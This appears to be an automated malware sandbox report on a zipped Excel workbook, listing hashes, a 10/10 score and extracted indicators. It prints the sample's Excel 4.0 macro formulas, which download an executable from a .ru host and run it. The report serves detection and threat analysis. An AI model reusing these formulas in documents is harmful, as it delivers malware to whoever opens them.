General

  • Target

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip

  • Size

    45KB

  • MD5

    f0e511946dbf25ba70ef77636ddaaec8

  • SHA1

    f890230a292fca9d27f88c3725f41320ff4810ad

  • SHA256

    9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276

  • SHA512

    79b33a4198b6f4615cf454cc294fe27425cf9a9595a962df90e166489c3cea37f80c8eaff91c0e83005acba32716253358db42ca83055f6a5ddd6394995617db

  • SSDEEP

    768:Tx2U43NtxXkjkUXPKX/bNYvv8dtaYfbN0CWTqS+SaTS3FDY8ic:TUjJrU/WKeE26eS+v23KI

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://invoice7mukszq9nbpa7online.ru/unfeminized.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://invoice7mukszq9nbpa7online.ru/unfeminized.exe","C:\ProgramData\plaukbp.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\plaukbp.exe",,0,0) =HALT()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 9cf979d335b81e468e3633440256030be7723c5d5fb1bbcc7d016ea6ec539276.zip
    .zip

    Password: infected

  • 42b382be2e0f600fcec16ead4440475ffa839ed56724ef960b24f2affda4afb9.xlsm
    .xlsm office2007